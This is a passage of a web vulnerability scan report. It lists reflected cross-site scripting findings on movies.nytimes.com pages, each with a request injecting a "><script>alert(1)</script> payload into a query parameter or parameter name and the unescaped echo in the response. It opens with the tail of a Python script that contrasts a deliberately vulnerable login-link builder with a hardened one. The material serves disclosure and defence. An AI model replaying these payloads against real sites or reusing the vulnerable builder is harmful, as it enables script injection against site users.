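# Sink 3 (motherjones.com pattern): the request path is reflected as the value
# of the login link's destination parameter.
def login_link_vulnerable(path: str) -> str:
    return '<a href="/user/login?destination=%s" title="Login">' % path


def login_link_hardened(path: str) -> str:
    """Two layers, innermost first: percent-encode the path as a query value,
    then attribute-encode the result for the href."""
    return '<a href="/user/login?destination=%s" title="Login">' % attribute_encoded(
        quote(path, safe="/"))


def report() -> dict:
    """Map each builder to whether its output lets the payload break out."""
    query = "src=dayp" + PAYLOAD
    path = "kevin-drum/2010" + PAYLOAD + "/11/deficit-commission-serious"
    return {
        "backslash_escaped": attribute_context_broken(link_with_backslash_escaping(query)),
        "print_link_vulnerable": attribute_context_broken(print_link_vulnerable(query)),
        "print_link_hardened": attribute_context_broken(print_link_hardened(query)),
        "login_link_vulnerable": attribute_context_broken(login_link_vulnerable(path)),
        "login_link_hardened": attribute_context_broken(login_link_hardened(path)),
    }


if __name__ == "__main__":
    for name, broken in report().items():
        print("%-22s %s" % (name, "BROKEN" if broken else "safe"))
```

The check deliberately asks the tokenizer rather than grepping for the payload string: a reflection that survives verbatim but stays inside the attribute (for instance after &quot; encoding) is not exploitable in this context, while the backslash variant looks "escaped" and still is. Percent-encoding alone would also have stopped these particular payloads, but the attribute-encoding layer is what makes the href safe regardless of what the inner serialiser lets through.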

3.147. http://movies.nytimes.com/2010/11/10/movies/10morning.html [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/10/movies/10morning.html

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40d84"><script>alert(1)</script>ce1cd022825 was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/10/movies/10morning.html?src=dayp40d84"><script>alert(1)</script>ce1cd022825 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:07 GMT
Content-type: text/html
Content-Length: 74132



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/10/movies/10morning.html?src=dayp40d84"><script>alert(1)</script>ce1cd022825&pagewanted=print">
...[SNIP]...

3.148. http://movies.nytimes.com/2010/11/12/movies/12con.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12con.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff212"><script>alert(1)</script>0c4b8fd9ceb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12con.html?ff212"><script>alert(1)</script>0c4b8fd9ceb=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:19 GMT
Content-type: text/html
Content-Length: 68389



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12con.html?ff212"><script>alert(1)</script>0c4b8fd9ceb=1&pagewanted=print">
...[SNIP]...

3.149. http://movies.nytimes.com/2010/11/12/movies/12con.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12con.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31673"><script>alert(1)</script>5674461d5ef was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12con.html?ref=todayspaper31673"><script>alert(1)</script>5674461d5ef HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:24 GMT
Content-type: text/html
Content-Length: 67711



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12con.html?ref=todayspaper31673"><script>alert(1)</script>5674461d5ef&pagewanted=print">
...[SNIP]...

3.150. http://movies.nytimes.com/2010/11/12/movies/12cool.html [hpw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12cool.html

Issue detail

The hpw request parameter is sent bare (no = sign), so the payload is appended directly to it and the resulting query string is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6752"><script>alert(1)</script>74abf7409cf was submitted in the hpw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12cool.html?hpwe6752"><script>alert(1)</script>74abf7409cf HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:14 GMT
Content-type: text/html
Content-Length: 72542



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12cool.html?hpwe6752"><script>alert(1)</script>74abf7409cf&pagewanted=print">
...[SNIP]...

3.151. http://movies.nytimes.com/2010/11/12/movies/12cool.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12cool.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87b8d"><script>alert(1)</script>54b1ab9b218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12cool.html?hpw&87b8d"><script>alert(1)</script>54b1ab9b218=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:15 GMT
Content-type: text/html
Content-Length: 72399



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12cool.html?hpw&87b8d"><script>alert(1)</script>54b1ab9b218=1&pagewanted=print">
...[SNIP]...

3.152. http://movies.nytimes.com/2010/11/12/movies/12cool.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12cool.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dd44"><script>alert(1)</script>9aa1f156ce7 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12cool.html?ref=todayspaper8dd44"><script>alert(1)</script>9aa1f156ce7 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:20 GMT
Content-type: text/html
Content-Length: 72629



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12cool.html?ref=todayspaper8dd44"><script>alert(1)</script>9aa1f156ce7&pagewanted=print">
...[SNIP]...

3.153. http://movies.nytimes.com/2010/11/12/movies/12disco.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12disco.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9017b"><script>alert(1)</script>45b207650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12disco.html?9017b"><script>alert(1)</script>45b207650=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:27 GMT
Content-type: text/html
Content-Length: 72730



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12disco.html?9017b"><script>alert(1)</script>45b207650=1&pagewanted=print">
...[SNIP]...

3.154. http://movies.nytimes.com/2010/11/12/movies/12disco.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12disco.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d08f"><script>alert(1)</script>69375a1df98 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12disco.html?ref=todayspaper2d08f"><script>alert(1)</script>69375a1df98 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:30 GMT
Content-type: text/html
Content-Length: 69744



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12disco.html?ref=todayspaper2d08f"><script>alert(1)</script>69375a1df98&pagewanted=print">
...[SNIP]...

3.155. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12eichmann.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1b27"><script>alert(1)</script>9def6fb92c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12eichmann.html?b1b27"><script>alert(1)</script>9def6fb92c5=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:31 GMT
Content-type: text/html
Content-Length: 73079



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12eichmann.html?b1b27"><script>alert(1)</script>9def6fb92c5=1&pagewanted=print">
...[SNIP]...

3.156. http://movies.nytimes.com/2010/11/12/movies/12eichmann.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12eichmann.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a15af"><script>alert(1)</script>c361f4dc1e3 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12eichmann.html?ref=todayspapera15af"><script>alert(1)</script>c361f4dc1e3 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:32 GMT
Content-type: text/html
Content-Length: 71255



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12eichmann.html?ref=todayspapera15af"><script>alert(1)</script>c361f4dc1e3&pagewanted=print">
...[SNIP]...

3.157. http://movies.nytimes.com/2010/11/12/movies/12helena.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12helena.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a48c1"><script>alert(1)</script>f0282204989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12helena.html?a48c1"><script>alert(1)</script>f0282204989=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:29 GMT
Content-type: text/html
Content-Length: 67007



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12helena.html?a48c1"><script>alert(1)</script>f0282204989=1&pagewanted=print">
...[SNIP]...

3.158. http://movies.nytimes.com/2010/11/12/movies/12helena.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12helena.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64df0"><script>alert(1)</script>d14aae068de was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12helena.html?ref=todayspaper64df0"><script>alert(1)</script>d14aae068de HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:32 GMT
Content-type: text/html
Content-Length: 66696



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12helena.html?ref=todayspaper64df0"><script>alert(1)</script>d14aae068de&pagewanted=print">
...[SNIP]...

3.159. http://movies.nytimes.com/2010/11/12/movies/12magic.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12magic.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd739"><script>alert(1)</script>dc7aa52ab74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12magic.html?cd739"><script>alert(1)</script>dc7aa52ab74=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:29 GMT
Content-type: text/html
Content-Length: 65843



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12magic.html?cd739"><script>alert(1)</script>dc7aa52ab74=1&pagewanted=print">
...[SNIP]...

3.160. http://movies.nytimes.com/2010/11/12/movies/12magic.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12magic.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1406e"><script>alert(1)</script>b4e8ca7152d was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12magic.html?ref=todayspaper1406e"><script>alert(1)</script>b4e8ca7152d HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:34 GMT
Content-type: text/html
Content-Length: 66285



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12magic.html?ref=todayspaper1406e"><script>alert(1)</script>b4e8ca7152d&pagewanted=print">
...[SNIP]...

3.161. http://movies.nytimes.com/2010/11/12/movies/12shake.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12shake.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cb50"><script>alert(1)</script>3a8abc30d4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12shake.html?3cb50"><script>alert(1)</script>3a8abc30d4a=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:24 GMT
Content-type: text/html
Content-Length: 73541



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12shake.html?3cb50"><script>alert(1)</script>3a8abc30d4a=1&pagewanted=print">
...[SNIP]...

3.162. http://movies.nytimes.com/2010/11/12/movies/12shake.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12shake.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 936e2"><script>alert(1)</script>24773b8c686 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12shake.html?ref=todayspaper936e2"><script>alert(1)</script>24773b8c686 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:22 GMT
Content-type: text/html
Content-Length: 74178



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12shake.html?ref=todayspaper936e2"><script>alert(1)</script>24773b8c686&pagewanted=print">
...[SNIP]...

3.163. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12tiny.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f8da"><script>alert(1)</script>c3bf061f155 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12tiny.html?1f8da"><script>alert(1)</script>c3bf061f155=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:09 GMT
Content-type: text/html
Content-Length: 72793



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12tiny.html?1f8da"><script>alert(1)</script>c3bf061f155=1&pagewanted=print">
...[SNIP]...

3.164. http://movies.nytimes.com/2010/11/12/movies/12tiny.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12tiny.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e7b"><script>alert(1)</script>5a75fc2d357 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12tiny.html?ref=todayspaperf5e7b"><script>alert(1)</script>5a75fc2d357 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:11 GMT
Content-type: text/html
Content-Length: 73419



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12tiny.html?ref=todayspaperf5e7b"><script>alert(1)</script>5a75fc2d357&pagewanted=print">
...[SNIP]...

3.165. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [hpw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12unstop.html

Issue detail

The hpw request parameter is sent bare (no = sign), so the payload is appended directly to it and the resulting query string is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffbd2"><script>alert(1)</script>07947578a14 was submitted in the hpw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12unstop.html?hpwffbd2"><script>alert(1)</script>07947578a14 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:18 GMT
Content-type: text/html
Content-Length: 74619



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?hpwffbd2"><script>alert(1)</script>07947578a14&pagewanted=print">
...[SNIP]...

3.166. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12unstop.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea22b"><script>alert(1)</script>b2be1849c05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12unstop.html?ea22b"><script>alert(1)</script>b2be1849c05=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:01 GMT
Content-type: text/html
Content-Length: 73539



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?ea22b"><script>alert(1)</script>b2be1849c05=1&pagewanted=print">
...[SNIP]...

3.167. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12unstop.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63a87"><script>alert(1)</script>e87edf3b78 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12unstop.html?ref=todayspaper63a87"><script>alert(1)</script>e87edf3b78 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:15 GMT
Content-type: text/html
Content-Length: 74735



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?ref=todayspaper63a87"><script>alert(1)</script>e87edf3b78&pagewanted=print">
...[SNIP]...

3.168. http://movies.nytimes.com/2010/11/12/movies/12unstop.html [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/12/movies/12unstop.html

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e5f"><script>alert(1)</script>7ccb997166a was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/movies/12unstop.html?src=dayp98e5f"><script>alert(1)</script>7ccb997166a HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:11 GMT
Content-type: text/html
Content-Length: 74106



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/12/movies/12unstop.html?src=dayp98e5f"><script>alert(1)</script>7ccb997166a&pagewanted=print">
...[SNIP]...

3.169. http://movies.nytimes.com/2010/11/13/movies/13sky.html [hpw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/13/movies/13sky.html

Issue detail

The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 221ad"><script>alert(1)</script>f35b5011bda was submitted in the hpw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/13/movies/13sky.html?hpw221ad"><script>alert(1)</script>f35b5011bda HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:34 GMT
Content-type: text/html
Content-Length: 72211



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/13/movies/13sky.html?hpw221ad"><script>alert(1)</script>f35b5011bda&pagewanted=print">
...[SNIP]...

3.170. http://movies.nytimes.com/2010/11/13/movies/13sky.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /2010/11/13/movies/13sky.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad1ea"><script>alert(1)</script>f474dec4118 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/13/movies/13sky.html?ad1ea"><script>alert(1)</script>f474dec4118=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:33 GMT
Content-type: text/html
Content-Length: 70797



...[SNIP]...
<a href="http://movies.nytimes.com/2010/11/13/movies/13sky.html?ad1ea"><script>alert(1)</script>f474dec4118=1&pagewanted=print">
...[SNIP]...

3.171. http://movies.nytimes.com/movie/401469/Unstoppable/overview [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://movies.nytimes.com
Path:   /movie/401469/Unstoppable/overview

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba18d"><script>alert(1)</script>494c7d4f0db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movie/401469/Unstoppable/overview?ba18d"><script>alert(1)</script>494c7d4f0db=1 HTTP/1.1
Host: movies.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:06:09 GMT
Content-type: text/html
Content-Length: 43755


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
                   <title>Unstoppable - Trailer - Cast - Showtimes - NYTimes.com </title>

...[SNIP]...
<meta name="communityAssetTaxonomy" content="movie//Unstoppable?ba18d"><script>alert(1)</script>494c7d4f0db=1">
...[SNIP]...

3.172. http://nahright.com/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nahright.com
Path:   /news/

Issue detail

